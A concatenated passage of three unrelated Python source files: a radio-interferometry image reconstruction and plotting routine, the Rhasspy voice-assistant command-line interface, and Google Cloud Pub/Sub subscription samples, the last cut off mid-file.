keep = np.array([ (datadict['s1'][j] in stations) and (datadict['s2'][j] in stations) for j in range(len(datadict['s1'])) ])
ddtmp = {}
for key in ['u','v','V','s1','s2','t','err'] :
ddtmp[key] = datadict[key][keep]
if (len(ddtmp['u'])==0) :
return None,None,None
# Exclude stations that are "off"
keep = np.array([ statdict[ddtmp['s1'][j]]['on'] and statdict[ddtmp['s2'][j]]['on'] for j in range(len(ddtmp['s1'])) ])
ddnew = {}
for key in ['u','v','V','s1','s2','t','err'] :
ddnew[key] = ddtmp[key][keep]
if (len(ddnew['u'])==0) :
return None,None,None
# Exclude data points outside the specified time range
if (not time_range is None) :
keep = (ddnew['t']>=time_range[0])*(ddnew['t']<time_range[1])
for key in ['u','v','V','s1','s2','t','err'] :
ddnew[key] = ddnew[key][keep]
if (len(ddnew['u'])==0) :
return None,None,None
# Cut points with S/N less than the specified minimum value
if (not snr_cut is None) and snr_cut>0:
# Get a list of error adjustments based on stations
diameter_correction_factor = {}
for s in stations :
if (statdict[s]['exists']) :
diameter_correction_factor[s] = 1.0
else :
diameter_correction_factor[s] = statdict[s]['diameter']/ngeht_diameter
keep = np.array([ np.abs(ddnew['V'][j])/(ddnew['err'][j].real * diameter_correction_factor[ddnew['s1'][j]] * diameter_correction_factor[ddnew['s2'][j]]) > snr_cut for j in range(len(ddnew['s1'])) ])
for key in ['u','v','V','s1','s2','t','err'] :
ddnew[key] = ddnew[key][keep]
if (len(ddnew['u'])==0) :
return None,None,None
# Double up data to make V hemitian
if (make_hermitian) :
ddnew['u'] = np.append(ddnew['u'],-ddnew['u'])
ddnew['v'] = np.append(ddnew['v'],-ddnew['v'])
ddnew['V'] = np.append(ddnew['V'],np.conj(ddnew['V']))
if (len(ddnew['u'])<=2) :
return None,None,None
# Get the region on which to compute gridded visibilities
umax = np.max(ddnew['u'])
vmax = np.max(ddnew['v'])
u2,v2 = np.meshgrid(np.linspace(-f*umax,f*umax,256),np.linspace(-f*vmax,f*vmax,256))
# SciPy
# pts = np.array([ddnew['u'],ddnew['v']]).T
# V2r = si.griddata(pts,np.real(ddnew['V']),(u2,v2),method=method,fill_value=0.0)
# V2i = si.griddata(pts,np.imag(ddnew['V']),(u2,v2),method=method,fill_value=0.0)
# Maptlotlib
triang = tri.Triangulation(ddnew['u'], ddnew['v'])
if (method=='linear') :
V2r = np.array(np.ma.fix_invalid(tri.LinearTriInterpolator(triang, np.real(ddnew['V']))(u2,v2),fill_value=0.0))
V2i = np.array(np.ma.fix_invalid(tri.LinearTriInterpolator(triang, np.imag(ddnew['V']))(u2,v2),fill_value=0.0))
elif (method=='cubic') :
V2r = np.array(np.ma.fix_invalid(tri.CubicTriInterpolator(triang, np.real(ddnew['V']),kind='geom')(u2,v2),fill_value=0.0))
V2i = np.array(np.ma.fix_invalid(tri.CubicTriInterpolator(triang, np.imag(ddnew['V']),kind='geom')(u2,v2),fill_value=0.0))
else :
print("ERROR: method %s not implemented"%(method))
V2 = V2r + 1.0j*V2i
# Filter to smooth at edges
V2 = V2 * np.cos(u2/umax*0.5*np.pi) * np.cos(v2/vmax*0.5*np.pi)
# hu = 0.42 - 0.5*np.cos(2.0*np.pi*(u2+umax)/(2*umax)) + 0.08*np.cos(4.0*np.pi*(u2+umax)/(2*umax))
# hv = 0.42 - 0.5*np.cos(2.0*np.pi*(v2+umax)/(2*umax)) + 0.08*np.cos(4.0*np.pi*(v2+umax)/(2*umax))
# V2 = V2*hu*hv
# Generate the x,y grid on which to image
x1d = np.fft.fftshift(np.fft.fftfreq(u2.shape[0],d=(u2[1,1]-u2[0,0])*1e9)/uas2rad)
y1d = np.fft.fftshift(np.fft.fftfreq(v2.shape[1],d=(v2[1,1]-v2[0,0])*1e9)/uas2rad)
xarr,yarr = np.meshgrid(-x1d,-y1d)
# Compute image estimate via FFT
Iarr = np.fft.fftshift(np.real(np.fft.ifft2(np.fft.ifftshift(V2))))
# Iarr = np.fft.fftshift(np.abs(np.fft.ifft2(np.fft.ifftshift(V2))))
# print("Finished image reconstruction in thread")
# Return
return xarr,yarr,Iarr
def generate_mpl_plot(self,fig,ax,**kwargs) :
if (__cheap_image_debug__) :
print("InteractiveImageReconstructionPlot.generate_mpl_plot: start")
# This is where we insert a Matplotlib figure. Must use ax. and fig. child commands.
# You probably want, but do not require, the following in your over-lay
self.plot_image_reconstruction(ax,self.ddict,self.sdict,**kwargs)
ax.set_facecolor((0,0,0,1))
fig.set_facecolor((0,0,0,1))
def update(self,datadict,statdict,**kwargs) :
self.sdict = statdict
self.ddict = datadict
# print("Started update, initiating thread:",kwargs)
self.update_mpl(**kwargs)
# # create the thread to invoke other_func with arguments (2, 5)
# andrews_specific_name = threading.Thread(target=self.update_mpl, kwargs=kwargs)
# # # set daemon to true so the thread dies when app is closed
# andrews_specific_name.daemon = True
# # start the thread
# andrews_specific_name.start()
# # wait for end for now
# andrews_specific_name.join()
# #time.sleep(10) # HACK
# print("Finished update, should have finished thread")
def replot(self,datadict,statdict,**kwargs) :
self.sdict = statdict
self.ddict = datadict
self.update_mpl(**kwargs)
# print("Started replot, initiating thread")
# # create the thread to invoke other_func with arguments (2, 5)
# t = threading.Thread(target=self.update_mpl, kwargs=kwargs)
# # # set daemon to true so the thread dies when app is closed
# # t.daemon = True
# # start the thread
# t.start()
# # wait for end for now
# t.join()
# print("Finished replot, should have finished thread")
def check_boundaries(self,tex_coords) :
return tex_coords
def check_size(self,size) :
if (size[0]<self.width) :
size = (self.width, size[1]/size[0] * self.width)
elif (size[1]<self.height) :
size = (size[0]/size[1] * self.height, self.height)
return size
############
# High-level plot generation
def plot_image_reconstruction(self,axs,datadict,statdict,time_range=None,snr_cut=None,ngeht_diameter=6,limits=None,show_map=True,show_contours=True) :
if (len(statdict.keys())==0) :
return
# Reconstruct image
self.xarr,self.yarr,self.Iarr=self.reconstruct_image(datadict,statdict,time_range=time_range,snr_cut=snr_cut,ngeht_diameter=ngeht_diameter)
self.replot_image_reconstruction(axs,time_range=time_range,limits=limits,show_map=show_map,show_contours=show_contours)
############
# High-level plot generation
def replot_image_reconstruction(self,axs,time_range=None,limits=None,show_map=True,show_contours=True) :
if (self.Iarr is None) :
axs.text(0.5,0.5,"Insufficient Data!",color='w',fontsize=24,ha='center',va='center')
return
# Plot linear image
if (show_map) :
axs.imshow(self.Iarr,origin='lower',extent=[self.xarr[0,0],self.xarr[0,-1],self.yarr[0,0],self.yarr[-1,0]],cmap='afmhot',vmin=0,interpolation='spline16')
# Plot the log contours
if (show_contours) :
lI = np.log10(np.maximum(0.0,self.Iarr)/np.max(self.Iarr)+1e-20)
lmI = np.log10(np.maximum(0.0,-self.Iarr)/np.max(self.Iarr)+1e-20)
lev10lo = max(np.min(lI[self.Iarr>0]),-4)
lev10 = np.sort( -np.arange(0,lev10lo,-1) )
axs.contour(self.xarr,self.yarr,-lI,levels=lev10,colors='cornflowerblue',alpha=0.5)
#plt.contour(self.x,self.y,-lmI,levels=lev10,colors='green',alpha=0.5)
lev1 = []
for l10 in -lev10[1:] :
lev1.extend( np.log10(np.array([2,3,4,5,6,7,8,9])) + l10 )
lev1 = np.sort(-np.array(lev1))
axs.contour(self.xarr,self.yarr,-lI,levels=lev1,colors='cornflowerblue',alpha=0.5,linewidths=0.5)
axs.contour(self.xarr,self.yarr,-lmI,levels=lev1[-10:],colors='green',alpha=0.5,linewidths=0.5)
# Fix the limits
if (not limits is None) :
axs.set_xlim((limits[0],limits[1]))
axs.set_ylim((limits[2],limits[3]))
else :
xmin = min(np.min(self.xarr[lI>-2]),np.min(self.yarr[lI>-2]))
xmax = max(np.max(self.xarr[lI>-2]),np.max(self.yarr[lI>-2]))
axs.set_xlim((xmax,xmin))
axs.set_ylim((xmin,xmax))
|
__init__.py
|
"""Rhasspy command-line interface"""
import argparse
import asyncio
import io
import json
import logging
# Configure logging
import logging.config
import os
import sys
import threading
import time
import wave
from typing import Any
from rhasspy.audio_recorder import AudioData
from rhasspy.core import RhasspyCore
from rhasspy.profiles import Profile
from rhasspy.utils import buffer_to_wav
from rhasspy.wake import WakeWordDetected
logger = logging.getLogger("rhasspy")
# -----------------------------------------------------------------------------
# Globals
# -----------------------------------------------------------------------------
mic_stdin_thread = None
mic_stdin_running = False
# -----------------------------------------------------------------------------
async def main() -> None:
"""Main method"""
global mic_stdin_running, mic_stdin_thread
# Parse command-line arguments
parser = argparse.ArgumentParser(description="Rhasspy")
parser.add_argument(
"--profile", "-p", required=True, type=str, help="Name of profile to use"
)
parser.add_argument(
"--system-profiles",
type=str,
help="Directory with base profile files (read only)",
default=os.path.join(os.getcwd(), "profiles"),
)
parser.add_argument(
"--user-profiles",
type=str,
help="Directory with user profile files (read/write)",
default=os.path.expanduser("~/.config/rhasspy/profiles"),
)
parser.add_argument(
"--set",
"-s",
nargs=2,
action="append",
help="Set a profile setting value",
default=[],
)
parser.add_argument(
"--debug", action="store_true", help="Print DEBUG log to console"
)
parser.add_argument(
"--no-check",
action="store_true",
help="Don't check profile for necessary files",
)
sub_parsers = parser.add_subparsers(dest="command")
sub_parsers.required = True
# info
info_parser = sub_parsers.add_parser("info", help="Profile information")
info_parser.add_argument(
"--defaults", action="store_true", help="Only print default settings"
)
# wav2text
wav2text_parser = sub_parsers.add_parser(
"wav2text", help="WAV file to text transcription"
)
wav2text_parser.add_argument("wav_files", nargs="*", help="Paths to WAV files")
# text2intent
text2intent_parser = sub_parsers.add_parser(
"text2intent", help="Text parsed to intent"
)
text2intent_parser.add_argument("sentences", nargs="*", help="Sentences to parse")
text2intent_parser.add_argument(
"--handle", action="store_true", help="Pass result to intent handler"
)
# wav2intent
wav2intent_parser = sub_parsers.add_parser(
"wav2intent", help="WAV file to parsed intent"
)
wav2intent_parser.add_argument("wav_files", nargs="*", help="Paths to WAV files")
wav2intent_parser.add_argument(
"--handle", action="store_true", help="Pass result to intent handler"
)
# train
train_parser = sub_parsers.add_parser("train", help="Re-train profile")
train_parser.add_argument(
"--no-cache", action="store_true", help="Clear training cache"
)
# mic2wav
mic2wav_parser = sub_parsers.add_parser("mic2wav", help="Voice command to WAV data")
mic2wav_parser.add_argument(
"--timeout",
type=float,
default=None,
help="Maximum number of seconds to record (default=profile)",
)
# mic2text
mic2text_parser = sub_parsers.add_parser(
"mic2text", help="Voice command to text transcription"
)
mic2text_parser.add_argument(
"--timeout",
type=float,
default=None,
help="Maximum number of seconds to record (default=profile)",
)
# mic2intent
mic2intent_parser = sub_parsers.add_parser(
"mic2intent", help="Voice command to parsed intent"
)
mic2intent_parser.add_argument(
"--stdin", action="store_true", help="Read audio data from stdin"
)
mic2intent_parser.add_argument(
"--handle", action="store_true", help="Pass result to intent handler"
)
mic2intent_parser.add_argument(
"--timeout",
type=float,
default=None,
help="Maximum number of seconds to record (default=profile)",
)
# word2phonemes
word2phonemes_parser = sub_parsers.add_parser(
"word2phonemes", help="Get pronunciation(s) for word(s)"
)
word2phonemes_parser.add_argument("words", nargs="*", help="Word(s) to pronounce")
word2phonemes_parser.add_argument(
"-n", type=int, default=1, help="Maximum number of pronunciations"
)
# word2wav
word2wav_parser = sub_parsers.add_parser("word2wav", help="Pronounce word")
word2wav_parser.add_argument("word", help="Word to pronounce")
# wav2mqtt
wav2mqtt_parser = sub_parsers.add_parser(
"wav2mqtt", help="Push WAV file(s) to MQTT"
)
wav2mqtt_parser.add_argument("wav_files", nargs="*", help="Paths to WAV files")
wav2mqtt_parser.add_argument(
"--frames",
type=int,
default=480,
help="WAV frames per MQTT message (default=0 for all)",
)
wav2mqtt_parser.add_argument(
"--site-id", type=str, default="default", help="Hermes siteId (default=default)"
)
wav2mqtt_parser.add_argument(
"--silence-before",
type=float,
default=0,
help="Seconds of silence to add before each WAV",
)
wav2mqtt_parser.add_argument(
"--silence-after",
type=float,
default=0,
help="Seconds of silence to add after each WAV",
)
wav2mqtt_parser.add_argument(
"--pause",
type=float,
default=0.01,
help="Seconds to wait before sending next chunk (default=0.01)",
)
# text2wav
text2wav_parser = sub_parsers.add_parser(
"text2wav", help="Output WAV file using text to speech system"
)
text2wav_parser.add_argument("sentence", help="Sentence to speak")
# text2speech
text2speech_parser = sub_parsers.add_parser(
"text2speech", help="Speak sentences using text to speech system"
)
text2speech_parser.add_argument("sentences", nargs="*", help="Sentences to speak")
# sleep
sub_parsers.add_parser("sleep", help="Wait for wake word")
# download
download_parser = sub_parsers.add_parser("download", help="Download profile files")
download_parser.add_argument(
"--delete", action="store_true", help="Clear download cache before downloading"
)
# check
sub_parsers.add_parser("check", help="Check downloaded profile files")
# -------------------------------------------------------------------------
args = parser.parse_args()
if args.debug:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
profiles_dirs = [args.system_profiles, args.user_profiles]
logger.debug(profiles_dirs)
# Create rhasspy core
core = RhasspyCore(args.profile, args.system_profiles, args.user_profiles)
# Add profile settings from the command line
extra_settings = {}
for key, value in args.set:
try:
value = json.loads(value)
except Exception:
pass
logger.debug("Profile: %s=%s", key, value)
extra_settings[key] = value
core.profile.set(key, value)
# Handle command
if args.command == "info":
if args.defaults:
# Print default settings
json.dump(core.defaults, sys.stdout, indent=4)
else:
# Print profile settings
json.dump(core.profile.json, sys.stdout, indent=4)
elif args.command == "sentences":
sentences_path = core.profile.read_path(
core.profile.get("speech_to_text.sentences_ini", "sentences.ini")
)
with open(sentences_path, "r") as sentences_file:
sys.stdout.write(sentences_file.read())
else:
# Patch profile
profile = core.profile
profile.set("rhasspy.listen_on_start", False)
profile.set("rhasspy.preload_profile", False)
if args.command == "wav2mqtt":
profile.set("mqtt.enabled", True)
elif args.command in ["mic2intent"] and args.stdin:
profile.set("microphone.system", "stdin")
profile.set("microphone.stdin.auto_start", False)
mic_stdin_running = True
elif args.command == "text2wav":
profile.set("sounds.system", "dummy")
# Set environment variables
os.environ["RHASSPY_BASE_DIR"] = os.getcwd()
os.environ["RHASSPY_PROFILE"] = core.profile.name
os.environ["RHASSPY_PROFILE_DIR"] = core.profile.write_dir()
# Execute command
command_funcs = {
"wav2text": wav2text,
"text2intent": text2intent,
"wav2intent": wav2intent,
"train": train_profile,
"mic2text": mic2text,
"mic2intent": mic2intent,
"mic2wav": mic2wav,
"word2phonemes": word2phonemes,
"word2wav": word2wav,
"wav2mqtt": wav2mqtt,
"text2wav": text2wav,
"text2speech": text2speech,
"sleep": sleep,
"download": download,
"check": check,
}
# Automatically start core
await core.start()
if not args.no_check and (args.command not in ["check", "download"]):
# Verify that profile has necessary files
missing_files = core.check_profile()
if missing_files:
logger.fatal(
"Missing required files for %s: %s. Please run download command and try again.",
profile.name,
list(missing_files),
)
sys.exit(1)
if mic_stdin_running:
logger.debug("Reading audio data from stdin")
mic_stdin_thread = threading.Thread(
target=read_audio_stdin, args=(core,), daemon=True
)
mic_stdin_thread.start()
# Run command
try:
await command_funcs[args.command](core, profile, args)
if mic_stdin_thread is not None:
mic_stdin_running = False
mic_stdin_thread.join()
finally:
await core.shutdown()
# -----------------------------------------------------------------------------
# wav2text: transcribe WAV file(s) to text
# -----------------------------------------------------------------------------
async def wav2text(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Transcribe WAV file(s)"""
if args.wav_files:
# Read WAV paths from argument list
transcriptions = {}
for wav_path in args.wav_files:
with open(wav_path, "rb") as wav_file:
text = (await core.transcribe_wav(wav_file.read())).text
transcriptions[wav_path] = text
# Output JSON
json.dump(transcriptions, sys.stdout, indent=4)
else:
# Read WAV data from stdin
text = (await core.transcribe_wav(sys.stdin.buffer.read())).text
# Output text
print(text)
# -----------------------------------------------------------------------------
# text2intent: parse text into intent(s)
# -----------------------------------------------------------------------------
async def text2intent(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Parse sentences from command line or stdin"""
intents = {}
sentences = args.sentences or sys.stdin
for sentence in sentences:
sentence = sentence.strip()
intent = (await core.recognize_intent(sentence)).intent
if args.handle:
intent = (await core.handle_intent(intent)).intent
intents[sentence] = intent
# Output JSON
json.dump(intents, sys.stdout, indent=4)
# -----------------------------------------------------------------------------
# wav2intent: transcribe WAV file(s) to text and parse into intent(s)
# -----------------------------------------------------------------------------
async def wav2intent(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Recognize intent from WAV file(s)"""
if args.wav_files:
# Read WAV paths from argument list
transcriptions = {}
for wav_path in args.wav_files:
with open(wav_path, "rb") as wav_file:
text = (await core.transcribe_wav(wav_file.read())).text
transcriptions[wav_path] = text
# Parse intents
intents = {}
for wav_path, sentence in transcriptions.items():
intent = (await core.recognize_intent(sentence)).intent
if args.handle:
intent = (await core.handle_intent(intent)).intent
intents[wav_path] = intent
# Output JSON
json.dump(intents, sys.stdout, indent=4)
else:
# Read WAV data from stdin
sentence = (await core.transcribe_wav(sys.stdin.buffer.read())).text
intent = (await core.recognize_intent(sentence)).intent
if args.handle:
intent = (await core.handle_intent(intent)).intent
# Output JSON
json.dump(intent, sys.stdout, indent=4)
# -----------------------------------------------------------------------------
# train: re-train profile speech/intent recognizers
# -----------------------------------------------------------------------------
async def train_profile(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Train Rhasspy profile"""
result = await core.train(reload_actors=False, no_cache=args.no_cache)
print(result)
# -----------------------------------------------------------------------------
# mic2wav: record voice command and output WAV data
# -----------------------------------------------------------------------------
async def mic2wav(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Record voice command from microphone"""
# Listen until silence
wav_data = buffer_to_wav((await core.record_command(args.timeout)).data)
# Output WAV data
sys.stdout.buffer.write(wav_data)
# -----------------------------------------------------------------------------
# mic2text: record voice command, then transcribe
# -----------------------------------------------------------------------------
async def mic2text(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Record voice command and transcribe"""
# Listen until silence
wav_data = buffer_to_wav((await core.record_command(args.timeout)).data)
# Transcribe
text = (await core.transcribe_wav(wav_data)).text
# Output text
print(text)
# -----------------------------------------------------------------------------
# mic2intent: record voice command, then transcribe/parse
# -----------------------------------------------------------------------------
def read_audio_stdin(core: RhasspyCore, chunk_size: int = 960):
"""Record audio chunks from stdin"""
global mic_stdin_running
while mic_stdin_running:
audio_data = sys.stdin.buffer.read(chunk_size)
core.send_audio_data(AudioData(audio_data))
async def mic2intent(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Record voice command, transcribe, and recognize intent"""
# Listen until silence
wav_data = buffer_to_wav((await core.record_command(args.timeout)).data)
# Transcribe
sentence = (await core.transcribe_wav(wav_data)).text
# Parse
intent = (await core.recognize_intent(sentence)).intent
if args.handle:
intent = (await core.handle_intent(intent)).intent
# Output JSON
json.dump(intent, sys.stdout, indent=4)
# -----------------------------------------------------------------------------
# word2phonemes: get pronunciation(s) for a word
# -----------------------------------------------------------------------------
async def word2phonemes(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Get pronunciation(s) for word(s)"""
words = args.words
if not words:
words = [w.strip() for w in sys.stdin if w.strip()]
# Get pronunciations for all words
pronunciations = (
await core.get_word_pronunciations(words, n=args.n)
).pronunciations
# Output JSON
json.dump(pronunciations, sys.stdout, indent=4)
# -----------------------------------------------------------------------------
# word2wav: pronounce word as WAV data
# -----------------------------------------------------------------------------
async def word2wav(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Speak a word's pronunciation"""
# Get pronunciation for word
all_pronunciations = (
await core.get_word_pronunciations([args.word], n=1)
).pronunciations
word_pronunciations = all_pronunciations[args.word]["pronunciations"]
# Convert from CMU phonemes to eSpeak phonemes
espeak_str = (await core.get_word_phonemes(word_pronunciations[0])).phonemes
# Pronounce as WAV
wav_data = (await core.speak_word(espeak_str)).wav_data
# Output WAV data
sys.stdout.buffer.write(wav_data)
# -----------------------------------------------------------------------------
# wav2mqtt: output WAV data to MQTT via Hermes protocol
# -----------------------------------------------------------------------------
def _send_frame(
core: RhasspyCore,
topic: str,
audio_data: bytes,
rate: int,
width: int,
channels: int,
) -> None:
"""Send a single audio frame via MQTT"""
with io.BytesIO() as mqtt_buffer:
mqtt_file: wave.Wave_write = wave.open(mqtt_buffer, mode="wb")
with mqtt_file:
mqtt_file.setframerate(rate)
mqtt_file.setsampwidth(width)
mqtt_file.setnchannels(channels)
mqtt_file.writeframes(audio_data)
# Send audio frame WAV
mqtt_payload = mqtt_buffer.getvalue()
core.mqtt_publish(topic, mqtt_payload)
async def wav2mqtt(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Publish WAV to MQTT as audio frames"""
# hermes/audioServer/<SITE_ID>/audioFrame
topic = f"hermes/audioServer/{args.site_id}/audioFrame"
if args.wav_files:
# Read WAV paths from argument list
for wav_path in args.wav_files:
with wave.open(wav_path, "rb") as wav_file:
rate = wav_file.getframerate()
width = wav_file.getsampwidth()
channels = wav_file.getnchannels()
if args.frames > 0:
# Split into chunks
chunk_size = args.frames * width * channels
if args.silence_before > 0:
# Silence
num_chunks = int(
(args.silence_before * rate * width * channels) / chunk_size
)
for _ in range(num_chunks):
_send_frame(
core, topic, bytes(chunk_size), rate, width, channels
)
time.sleep(args.pause)
# Read actual audio data
audio_data = wav_file.readframes(args.frames)
while audio_data:
_send_frame(core, topic, audio_data, rate, width, channels)
time.sleep(args.pause)
# Read next chunk
audio_data = wav_file.readframes(args.frames)
if args.silence_after > 0:
# Silence
num_chunks = int(
(args.silence_after * rate * width * channels) / chunk_size
)
for _ in range(num_chunks):
_send_frame(
core, topic, bytes(chunk_size), rate, width, channels
)
time.sleep(args.pause)
else:
# Send all at once
audio_data = wav_file.readframes(wav_file.getnframes())
_send_frame(core, topic, audio_data, rate, width, channels)
print(wav_path)
# -----------------------------------------------------------------------------
# text2wav: speak sentence and output WAV
# -----------------------------------------------------------------------------
async def text2wav(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Speak a sentence and output WAV data"""
result = await core.speak_sentence(args)
sys.stdout.buffer.write(result.wav_data)
# -----------------------------------------------------------------------------
# text2speech: speak sentences
# -----------------------------------------------------------------------------
async def text2speech(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Speak sentences"""
sentences = args.sentences
if not sentences:
sentences = sys.stdin
for sentence in sentences:
sentence = sentence.strip()
await core.speak_sentence(sentence)
# -----------------------------------------------------------------------------
# sleep: wait for wake word
# -----------------------------------------------------------------------------
async def sleep(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Wait for wake word to be spoken"""
result = await core.wakeup_and_wait()
if isinstance(result, WakeWordDetected):
print(result.name)
else:
print("") # not detected
# -----------------------------------------------------------------------------
# download: download profile files
# -----------------------------------------------------------------------------
async def download(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Download necessary profile files"""
await core.download_profile(delete=args.delete)
print("OK")
# -----------------------------------------------------------------------------
# check: check profile files
# -----------------------------------------------------------------------------
async def check(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Verify that profile files are downloaded"""
missing_files = core.check_profile()
json.dump(missing_files, sys.stdout, indent=4)
# -----------------------------------------------------------------------------
if __name__ == "__main__":
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(main())
finally:
loop.close()
|
subscriber.py
|
#!/usr/bin/env python
# Copyright 2019 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This application demonstrates how to perform basic operations on
subscriptions with the Cloud Pub/Sub API.
For more information, see the README.md under /pubsub and the documentation
at https://cloud.google.com/pubsub/docs.
"""
import argparse
def list_subscriptions_in_topic(project_id, topic_name):
"""Lists all subscriptions for a given topic."""
# [START pubsub_list_topic_subscriptions]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO topic_name = "Your Pub/Sub topic name"
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path(project_id, topic_name)
for subscription in publisher.list_topic_subscriptions(topic_path):
print(subscription)
# [END pubsub_list_topic_subscriptions]
def list_subscriptions_in_project(project_id):
"""Lists all subscriptions in the current project."""
# [START pubsub_list_subscriptions]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
subscriber = pubsub_v1.SubscriberClient()
project_path = subscriber.project_path(project_id)
for subscription in subscriber.list_subscriptions(project_path):
print(subscription.name)
# [END pubsub_list_subscriptions]
def create_subscription(project_id, topic_name, subscription_name):
"""Create a new pull subscription on the given topic."""
# [START pubsub_create_pull_subscription]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO topic_name = "Your Pub/Sub topic name"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
topic_path = subscriber.topic_path(project_id, topic_name)
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
subscription = subscriber.create_subscription(
subscription_path, topic_path)
print('Subscription created: {}'.format(subscription))
# [END pubsub_create_pull_subscription]
def create_push_subscription(project_id,
topic_name,
subscription_name,
endpoint):
"""Create a new push subscription on the given topic."""
# [START pubsub_create_push_subscription]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO topic_name = "Your Pub/Sub topic name"
# TODO subscription_name = "Your Pub/Sub subscription name"
# TODO endpoint = "https://my-test-project.appspot.com/push"
subscriber = pubsub_v1.SubscriberClient()
topic_path = subscriber.topic_path(project_id, topic_name)
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
push_config = pubsub_v1.types.PushConfig(
push_endpoint=endpoint)
subscription = subscriber.create_subscription(
subscription_path, topic_path, push_config)
print('Push subscription created: {}'.format(subscription))
print('Endpoint for subscription is: {}'.format(endpoint))
# [END pubsub_create_push_subscription]
def delete_subscription(project_id, subscription_name):
"""Deletes an existing Pub/Sub topic."""
# [START pubsub_delete_subscription]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
subscriber.delete_subscription(subscription_path)
print('Subscription deleted: {}'.format(subscription_path))
# [END pubsub_delete_subscription]
def update_subscription(project_id, subscription_name, endpoint):
"""
Updates an existing Pub/Sub subscription's push endpoint URL.
Note that certain properties of a subscription, such as
its topic, are not modifiable.
"""
# [START pubsub_update_push_configuration]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO topic_name = "Your Pub/Sub topic name"
# TODO subscription_name = "Your Pub/Sub subscription name"
# TODO endpoint = "https://my-test-project.appspot.com/push"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
push_config = pubsub_v1.types.PushConfig(
push_endpoint=endpoint)
subscription = pubsub_v1.types.Subscription(
name=subscription_path,
push_config=push_config)
update_mask = {
'paths': {
'push_config',
}
}
subscriber.update_subscription(subscription, update_mask)
result = subscriber.get_subscription(subscription_path)
print('Subscription updated: {}'.format(subscription_path))
print('New endpoint for subscription is: {}'.format(
result.push_config))
# [END pubsub_update_push_configuration]
def receive_messages(project_id, subscription_name):
"""Receives messages from a pull subscription."""
# [START pubsub_subscriber_async_pull]
# [START pubsub_quickstart_subscriber]
import time
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
# The `subscription_path` method creates a fully qualified identifier
# in the form `projects/{project_id}/subscriptions/{subscription_name}`
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
def callback(message):
print('Received message: {}'.format(message))
message.ack()
subscriber.subscribe(subscription_path, callback=callback)
# The subscriber is non-blocking. We must keep the main thread from
# exiting to allow it to process messages asynchronously in the background.
print('Listening for messages on {}'.format(subscription_path))
while True:
time.sleep(60)
# [END pubsub_subscriber_async_pull]
# [END pubsub_quickstart_subscriber]
def receive_messages_with_custom_attributes(project_id, subscription_name):
"""Receives messages from a pull subscription."""
# [START pubsub_subscriber_sync_pull_custom_attributes]
# [START pubsub_subscriber_async_pull_custom_attributes]
import time
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
def callback(message):
print('Received message: {}'.format(message.data))
if message.attributes:
print('Attributes:')
for key in message.attributes:
value = message.attributes.get(key)
print('{}: {}'.format(key, value))
message.ack()
subscriber.subscribe(subscription_path, callback=callback)
# The subscriber is non-blocking, so we must keep the main thread from
# exiting to allow it to process messages in the background.
print('Listening for messages on {}'.format(subscription_path))
while True:
time.sleep(60)
# [END pubsub_subscriber_async_pull_custom_attributes]
# [END pubsub_subscriber_sync_pull_custom_attributes]
def receive_messages_with_flow_control(project_id, subscription_name):
"""Receives messages from a pull subscription with flow control."""
# [START pubsub_subscriber_flow_settings]
import time
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
def callback(message):
print('Received message: {}'.format(message.data))
message.ack()
# Limit the subscriber to only have ten outstanding messages at a time.
flow_control = pubsub_v1.types.FlowControl(max_messages=10)
subscriber.subscribe(
subscription_path, callback=callback, flow_control=flow_control)
# The subscriber is non-blocking, so we must keep the main thread from
# exiting to allow it to process messages in the background.
print('Listening for messages on {}'.format(subscription_path))
while True:
time.sleep(60)
# [END pubsub_subscriber_flow_settings]
def synchronous_pull(project_id, subscription_name):
